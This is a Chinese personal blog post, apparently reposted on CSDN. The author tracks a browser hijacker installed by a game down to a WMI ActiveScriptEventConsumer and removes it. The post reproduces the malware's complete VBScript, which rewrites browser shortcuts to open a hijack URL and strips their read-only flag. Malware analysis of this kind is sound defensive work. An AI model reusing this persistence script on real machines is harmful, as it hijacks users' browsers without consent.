浏览器快捷方式被流氓不定时调戏肿么办

转自 浏览器快捷方式被流氓不定时调戏肿么办


自从上次花了一晚上帮晓英弄史上最臃肿数据库#Oracle database#而错过星战零点场后,我就一直嚷嚷着要开始写博客备忘,一直以为第一篇博客会是《Spark源码走心解读》《你真的懂Hadoop吗》神马的,万万没想到会是这个….

em,前几天下了个小游戏(一点都不好玩),然后就发现所有浏览器打开时都会跳转到http://so.wnoyng.cn/?r=x,并不是简单地修改注册表,而是不定时地修改启动栏上的浏览器快捷方式的目标,添加辣鸡链接。

图1

真的是不定时啊,据我这两天的观察,lnk被修改的时间包括但不局限于7:51,13:25,19:51,20;36……..

那其实把快捷方式改成只读就好了,但是这个小流氓一直在我电脑里我就很不开心啊,于是我就用ProcessMonitor来监控进程(BTW,filter可以设为 Path ends with lnk),可是这个碧池好像知道我在监控似的,一直不出来作案,有天晚上挂着ProcMon,结果第二天起来内存爆了…

但好在我是一个#老板还没来#的#单身狗#,于是就一边看#真田丸(好看好看好看),一边挂着ProcMon,每一个小时清一下log,最后终于抓住了:scrcons.exe….但这TM是系统进程啊,我不能瞎比删啊。

感谢http://bbs.csdn.net/topics/390272533?page=1,“这是wmi下的脚本宿主,利用WMI中的永久事件消费者ActiveScriptEventConsumer(简称ASEC)实现的#三无后门#”…

em,说的好像很有道理,但是我并不懂…

感谢 http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html###,

反正就是一个通过WMI发起的定时自动运行脚本,(不过真的是定时的吗?)…

要查看WMI事件,到以下地址下载WMITool并安装, 
http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开wbemeventviewer,点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2”,确定,出现下图:

这里写图片描述

这个叫“VBScriptKids_consumer”的脚本(学名:ActiveScriptEventConsumer)就是我们要找的流氓,右键删除应该就能解决了吧?!…..

哦,不要忘了把被调戏的快捷方式改回去,具体哪些快捷方式被侮辱了可以看下面的ScriptText..

最后贴一下具体的脚本代码,有兴趣的可以参考参考:

<code class="hljs vbscript has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: "Source Code Pro", monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">On</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Error</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Resume</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Next</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Const</span> link = <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"http://so.wnoyng.cn/?r=x"</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Const</span> link360 = <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"http://so.wnoyng.cn/?r=x&s=3"</span>:browsers = <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"</span>:lnkpaths = <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Simon\Desktop,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"</span>:browsersArr = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">split</span>(browsers,<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">","</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Set</span> oDic = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">CreateObject</span>(<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"scripting.dictionary"</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">For</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Each</span> browser <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">In</span> browsersArr:oDic.Add <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">LCase</span>(browser), browser:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Next</span>:lnkpathsArr = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">split</span>(lnkpaths,<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">","</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Set</span> oFolders = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">CreateObject</span>(<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"scripting.dictionary"</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">For</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Each</span> lnkpath <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">In</span> lnkpathsArr:oFolders.Add lnkpath, lnkpath:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Next</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Set</span> fso = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">CreateObject</span>(<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"Scripting.Filesystemobject"</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Set</span> WshShell = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">CreateObject</span>(<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"Wscript.Shell"</span>):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">For</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Each</span> oFolder <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">In</span> oFolders:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span> fso.FolderExists(oFolder) <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Then</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">For</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Each</span> file <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">In</span> fso.GetFolder(oFolder).Files:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span> <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">LCase</span>(fso.GetExtensionName(file.Path)) = <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"lnk"</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Then</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Set</span> oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"."</span> & fso.GetExtensionName(path):<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span> oDic.Exists(<span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">LCase</span>(name)) <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Then</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span> <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">LCase</span>(name) = <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">LCase</span>(<span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"360se.exe"</span>) <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Then</span>:oShellLink.Arguments = link360:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Else</span>:oShellLink.Arguments = link:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">End</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span> file.Attributes <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">And</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Then</span>:file.Attributes = file.Attributes - <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">End</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span>:oShellLink.Save:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">End</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">End</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Next</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">End</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">If</span>:<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">Next</span>:</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right: 1px solid rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li></ul><div class="save_code tracking-ad" data-mod="popu_249" style="box-sizing: border-box; position: absolute; height: 60px; right: 30px; top: 5px; color: rgb(255, 255, 255); cursor: pointer; z-index: 2;"><a target=_blank target="_blank" style="box-sizing: border-box; color: rgb(12, 137, 207);"><img src="http://static.blog.csdn.net/images/save_snippets_01.png" style="border: none; box-sizing: border-box;" alt="" /></a></div><div><a target=_blank target="_blank" style="box-sizing: border-box; color: rgb(12, 137, 207);">
</a></div>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值